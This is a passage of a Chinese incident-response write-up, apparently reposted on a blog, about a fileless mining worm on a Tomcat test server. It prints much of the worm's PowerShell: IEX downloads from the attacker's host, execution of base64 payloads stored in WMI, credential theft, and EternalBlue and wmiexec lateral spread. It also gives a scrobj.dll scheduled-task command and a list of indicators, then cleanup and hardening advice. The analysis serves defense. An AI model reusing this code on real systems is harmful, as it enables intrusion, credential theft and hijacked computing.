        if (($avgs[0] -le 300) -and($avgs[0] -ne 0)){

 

            $nic = $se[0]

 

            break

 

        }

 

    }

 

    if ($i -eq 1){

 

        if ($avgs[1] -ne 0){

 

            if (($avgs[0] -le$avgs[1]) -and ($avgs[0] -ne 0)){

 

                $nic = $se[0]

 

                break

 

            }else{

 

                $nic = $se[1]

 

                break

 

            }

 

        }

 

    }

 

    if ($i -eq 2){

 

        if (($avgs[2] -le 300) -and($avgs[2] -ne 0)){

 

            $nic = $se[2]

 

            break

 

        }

 

    }

 

    if ($i -eq 3){

 

        if ($avgs[3] -ne 0){

 

            if (($avgs[2] -le$avgs[3]) -and ($avgs[2] -ne 0)){

 

                $nic = $se[2]

 

                break

 

            }else{

 

                $nic = $se[3]

 

                break

 

            }

 

        }

 

    }

 

}

 

//如果服务端版本不等于本地端版本,则下载服务端的antivirus.ps1

 

$nic=$nic+(':'+'443')

 

$ver=(New-ObjectNet.WebClient).DownloadString("http://$nic/ver.txt").Trim()

 

if($ver -ne $null){

 

    $ver_tmp=([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ver'].Value

 

    if($ver -ne $ver_tmp){

 

        IEX (New-ObjectNet.WebClient).DownloadString("http://$nic/antivirus.ps1")

 

        return

 

    }

 

}

 

//获取开机时间并进行定义

 

$stime=[Environment]::TickCount

 

//执行WmiClass里root\default:System_Anti_Virus_Core-"funs"属性内容,释放WMI exec和永恒之蓝攻击代码

 

$funs = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['funs'].Value

 

$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))

 

iex $defun

 

//在wmi对象里查找root\subscription空间,定位windows系统日志,删除

 

Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription |Where-Object {$_.filter -notmatch 'Windows Events'} |Remove-WmiObject

 

//按cpu大小递减方式逐个获取powershell.exe进程ID

 

[array]$psids= get-process -name powershell |sort cpu -Descending|ForEach-Object {$_.id}

 

$tcpconn = netstat -anop tcp

 

$exist=$False

 

//判断本机是否在给自己挖矿,例如已运行的powershell.exe和外部地址的80或14444或14433端口是否有已建立的TCP连接,否则循环

 

if ($psids -ne $null )

 

{

 

    foreach ($t in $tcpconn)

 

    {

 

        $line =$t.split(' ')|?{$_}

 

        if ($line -eq $null)

 

        {continue}

 

        if (($psids -contains$line[-1]) -and $t.contains("ESTABLISHED") -and($t.contains(":80 ") -or $t.contains(":14444") -or$t.contains(":14433")) )

 

        {

 

            $exist=$true

 

            break

 

        }

 

    }

 

}

 

!!!

 

RunDDOS "cohernece.exe"

 

KillBot('System_Anti_Virus_Core')

 

//杀掉其他挖矿程序,例如与外部端口3333,55555,7777已建立连接的挖矿程序

 

foreach ($t in $tcpconn)

 

    {

 

        $line =$t.split(' ')|?{$_}

 

        if (!($line -is[array])){continue}

 

        if(($line[-3].contains(":3333") -or$line[-3].contains(":5555") -or$line[-3].contains(":7777")) -and$t.contains("ESTABLISHED"))

 

        {

 

            $evid=$line[-1]

 

            Get-Process -id $evid| stop-process -force

 

        }

 

    }

 

//如果没有挖矿,例如本机没有连接外部14444或14433端口和已运行powershell.exe小于8个,执行WmiClass的root\default:System_Anti_Virus_Core-"mon"和"funs"属性内容进行挖矿和内网渗透。

 

if (!$exist -and ($psids.count -le 8))

 

{

 

    $cmdmon="powershell -NoP-NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;`$funs= ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value;iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -ScriptBlock `$RemoteScriptBlock-ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""

 

    $vbs = New-Object -ComObjectWScript.Shell

 

    $vbs.run($cmdmon,0)

 

}

 

//取WmiClass的root\default:System_Anti_Virus_Core-"mimi"属性内容赋给$mimi,并检查长度是否32位,如果不是将该内容输出至temp\a25hY2tlcmVk.txt文件

 

$NTLM=$False

 

$mimi = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['mimi'].Value

 

$a, $NTLM= Get-creds $mimi $mimi

 

if (($a -Split " ")[2].length -ne 32)

 

{

 

    ($a -Split " ")[2] |Out-File -Encoding ascii "$env:temp\a25hY2tlcmVk.txt"

 

}

 

$Networks = [System.Net.DNS]::GetHostByName($null).AddressList

 

//将"ipsu"属性内容赋值给$ipsu

 

$ipsu = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ipsu'].Value

 

//将"i17"属性内容赋值给$i17

 

$i17 = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['i17'].Value

 

//将"sc"属性内容赋值给$scba

 

$scba= ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['sc'].Value

 

//将"sc"属性内容转换成8位无符号整数数组

 

[byte[]]$sc=[System.Convert]::FromBase64String($scba)

 

foreach ($Network in $Networks)

 

{

 

//格式化IP地址

 

    $IPAddress  = $Network.IPAddressToString

 

//判断自身IP地址是否为空

 

    if ($IPAddress -match'^169.254'){continue}

 

    $SubnetMask  = '255.255.255.0'

 

//将Get-networkrange到的IP和掩码赋值给$ips_c

 

    $ips_c=Get-networkrange$IPAddress $SubnetMask

 

//将Get-IpInB到的IP赋值给$ips_b

 

    $ips_b=Get-IpInB $IPAddress

 

    $ips=$ips_c+$ips_b

 

    $tcpconn = netstat -anop tcp

 

//取tcp连接是已建立状态且不包含127.0.0.1,并不是自己连自己,最后类似入栈行为

 

    foreach ($t in $tcpconn)

 

    {

 

        $line =$t.split(' ')|?{$_}

 

        if (!($line -is[array])){continue}

 

        if ($line.count -le4){continue}

 

//分割外部地址并只取IP

 

        $i=$line[-3].split(':')[0]

 

//如果tcp连接是已建立状态且不包含127.0.0.1,并不是自己连自己则继续

 

        if ( ($line[-2] -eq'ESTABLISHED') -and  ($i -ne '127.0.0.1')-and ($ips -notcontains $i))

 

        {

 

            $ips+=$i

 

        }

 

    }

 

//如果开机时间小于1.5个小时则继续

 

    if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}

 

    foreach ($ip in $ips)

 

    {

 

        if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}

 

        if ($ip -eq$IPAddress){continue}

 

//MS17-010永恒之蓝攻击

 

                if ((Test-Port $ip)-ne $false -and $ipsu -notcontains $ip)

 

        {

 

            $re=0

 

            if ($a.count -ne 0)

 

            {$re = test-ip -ip $ip-creds $a  -nic $nic -ntlm $NTLM }

 

            if ($re -eq 1){$ipsu=$ipsu +" "+$ip}

 

            else

 

            {

 

                $vul=[PingCastle.Scanners.m17sc]::Scan($ip)

 

                if ($vul -and $i17-notcontains $ip)

 

                {

 

                   $res=eb7 $ip $sc

 

                   if (!($res -eq$true))

 

                   {eb8 $ip $sc}

 

                   $i17 = $i17 +" "+$ip

 

                }

 

            }

 

        }

 

    }

 

 }

 

//赋值给staticClass

 

$StaticClass=New-ObjectManagement.ManagementClass('root\default:System_Anti_Virus_Core')

 

//wmiexec攻击成功的失陷主机IP赋值给StaticClass的ipsu

 

$StaticClass.SetPropertyValue('ipsu' ,$ipsu)

 

//推送更新

 

$StaticClass.Put()

 

//永恒之蓝攻击成功将失陷主机IP赋值给StaticClass的i17

 

$StaticClass.SetPropertyValue('i17' ,$i17)

 

//推送更新

 

$StaticClass.Put()

 

 

2.8 powershell.exe(PID 3180)

内容和上一个powershell载荷重复,详见目录2.7。

2.9 WmiClass检查

根据分析PID 3964内存中的内容,发现各种恶意内容都储存在WMI root\default:System_Anti_Virus_Core中,如需要调用,也是直接加载到内存中执行,即实现本地无文件挖矿和内网渗透。

Windows自带wbemtest.exe工具可以管理Windows Management Instrumentation。图片.png

 

 

图片.png

图片.png图片.png

 

下拉框至最底部,发现PID 3964内存数据中存在的各个属性。

图片.png

图片.png

2.9.1 ver属性(由于不会代码,以下部分内容从数据包层面进行功能验证)

查询DNS记录,并ping测试服务端在线情况。

图片.png

数据包显示第一个动作即是验证版本,如版本不一致即下载antivirus.ps1。

图片.png图片.png更新完成之后服务端和本地端版本一致。

图片.png服务端版本

 

图片.png本地版本

 

2.9.2 funs属性

对funs内容进行解码并上传云端进行杀毒。

 

图片.png图片.png

 

2.9.3 ipsu/i17/mimi/sc属性

 

ipsu和i17由于wmiexec和MS17-010没有攻击成功所以属性没有赋值。

 

mimi和sc由于技术有限,未继续进行分析。

 

2.9.4 mon属性

 

技术有限,未在代码层面进行分析,PID 3180会释放mon内容进行挖矿行为。

 

图片.png图片.png图片.png2.9.5 内网渗透

 

根据PID 3964和PID 3180内存中的数据,分析两个程序都会释放funs内容以进行内网渗透。

 

图片.png从ARP层面判断存活主机:

 

图片.png从TCP三次握手机制判断目标范围内的445端口是否开启:

 

图片.png图片.png2.10 antivirus.ps1检查

 

由于PID 3964 get该文件并加载到内存后没有存储行为,且利用浏览器使用相同的请求头部也无法下载该文件,导致无法继续分析(后来发现在命令行中运行然后重定向到文件中即可对其进行分析)。根据该进程判断该文件至少包括修改WmiClass、下载cohernece.exe等恶意程序的功能。

 

2.11 cohernece.exe检查

 

该文件2019年1月12日1:30生成。

 

图片.png图片.png同目录下还存在java-log-9527.log,经查阅资料,该文件是cohernece.exe的攻击载荷。

 

图片.png2.12 关联检查

 

根据名称进行搜索。发现多个目录下存在该文件。如下图红框所示:

 

图片.png根据该文件生成时间进行搜索,同一时间在极其隐蔽的目录下:

 

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5

 

每隔20分钟就会自动生成一个htm文件。

 

图片.png图片.png对其进行解码,如下图所示,按名称理解主要作用于检查版本或本地/云端版本不一致时进行更新。

 

图片.png

 

下载内容如下简示:

 

图片.png由于其生成时间固定,查询到任务计划时发现恶意定时任务:

 

 

图片.png图片.png

 

两个任务计划定时操作:

/u /s /i:http://update.7h4uk.com/antivirus.php scrobj.dll

 

如上链接测试无法下载,80替换443后可以下载。

 

2.13 Ioc

 

2.13.1 url

 

update.7h4uk.com

 

info.7h4uk.com

 

f4keu.7h4uk.com

 

xmr-eu1.nanopool.org

2.13.2 ip

 

185.234.217.139

 

185.234.217.111

 

111.90.145.52

 

151.80.144.25

 

51.255.34.118

 

51.15.65.182

 

164.132.109.110

 

213.32.29.143

 

51.15.54.102

 

51.15.78.68

 

5.196.13.29

 

217.182.169.148

 

5.196.23.240

2.13.3 md5

 

cohernece.exe 4fe2de6fbb278e56c23e90432f21f6c8

 

9527.log      c2e31d4b8d6f9169d4557587b9d595ec

三、应急处置

 

根据现场情况经用户沟通确认,通过内网主机进行以下工作完成了对恶意程序的清除:

1.任务计划删除定时任务;

2.按顺序kill PID 3964、3180和cohernece.exe;

3.已在WMI中将root\default:System_Anti_Virus_Core的funs、i17、ipsu、mimi、mon、sc、ver属性删除;

4.已删除cohernece.exe和antivirus*.htm。

四、基础防护能力检查

 

4.1 防火墙和MS17010

 

在本地未安装MS17010相关补丁的情况下对外开放了445端口,且无第三方杀软或应用层防火墙,本地网络层防火墙未启用,无法针对入栈访问本地高危端口行为进行访问控制。

 

图片.png

 

4.2 Tomcat日志

 

Tomcat访问日志功能未启用。

 

图片.png

 

五、分析结论和处理建议

 

5.1 分析结论

 

本次内网主机CPU使用率过高经检查是因为存在挖矿行为导致,由于tomcat未启用访问日志记录功能,未在WEB层面进行攻击溯源。但根据目录4.1的分析,完全可以通过目录2中的恶意程序对内网防护不到位的主机实现自动化内网渗透。

 

5.2 处理建议

 

为减少被恶意行为取得管理权限后进行勒索或挖矿等发生安全事件的可能性,建议至少包括但不限于:

1.加强准入控制,访问应用系统建议必须经过多层应用防护;

2.内网管理服务器建议必须经过堡垒机管控和审计,外网管理服务器建议必须通过VPN加密进入内网后再通过堡垒机进行管控和审计;

3.加强准出控制,建议对互联网或对外提供服务的应用系统,在互联网出口只做端口映射或双向地址置换,如无必要,建议禁止互联网出口代理应用系统的IP出互联网;

4.应用系统建议经过代码审计和渗透测试后再对互联网或对外提供服务;

5.建议不要因为是测试服务器而降低其安全标准,基于木桶原理,以防测试服务器发生安全事件被获取权限从而可以横向渗透内网,因此再次强调业务系统服务器如无必要,禁止主动访问互联网,以防获取管理权限后反弹管理权限至互联网;

6.办公终端需预防U盘钓鱼或交叉感染恶意程序,尽量不要打开来历不明的文档、程序、邮件中的附件,防止社工钓鱼。

转载地址:https://blog.csdn.net/systemino/article/details/95021219 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!

上一篇:欺骗技术入门:13款开源工具分享
下一篇:Carbon:交互式反汇编工具

发表评论

最新留言

做的很好,不错不错
[***.243.131.199]2024年03月20日 04时10分06秒

关于作者

    喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!

推荐文章

c语言Wndproc未定义,小弟我用c语言写了一个windows窗口,为什么有提示未定义的变量类型... 2019-04-21
c语言中malloc数组,如何在C中对malloc()数组进行一行赋值? 2019-04-21
c语言调存储过程,写留言板–调用存储过程出问题 2019-04-21
c语言编程max,C语言编程题及答案.doc 2019-04-21
android测试页面,自动执行界面测试 | Android 开发者 | Android Developers 2019-04-21
android 图片点击变色,Android开发实现ListView点击item改变颜色功能示例 2019-04-21
android增删改查布局,Android之父_增删改查 2019-04-21
vowifi android开关,如何配置VoLTE, ViLTE and VoWifi(IMS config for VoLTE, ViLTE and VoWifi) 2019-04-21
电脑端的mafsvr服务关掉_网吧才是电脑优化的精髓!学会3招你也不用羡慕网吧的流畅了... 2019-04-21
html获取文件路径_HTML 文件路径 2019-04-21
mysql滴的一声就关了_关于mysql数据库在输入密码后,滴的一声直接退出界面的解决办法(详细办法)... 2019-04-21
mysql in 有序_mysql中的in排序 mysql按in中顺序来排序 2019-04-21
mysql 行转列 显示_mysql 行转列 (结果集以坐标显示) 2019-04-21
mysql 完全备份恢复吗_MySQL完全备份与恢复 2019-04-21
wpf 绘制矩形_WPF制作倒影效果 2019-04-21
mariadb mysql 5.7_MariaDB 10.1 和 MySQL 5.7 在普通商用硬件上的表现 2019-04-21
由于连接方在一段时间后没有正确答复或连接的主机_新风换气机使用效果不佳,为何?掌握正确使用方法就好了... 2019-04-21
mysql数据库断电恢复_MySQL数据库InnoDB引擎下服务器断电数据恢复方法 2019-04-21
python入门程序异常_Python 入门 之 异常处理 2019-04-21
python 键盘输入int_Python编程 Python如何获取数据 2019-04-21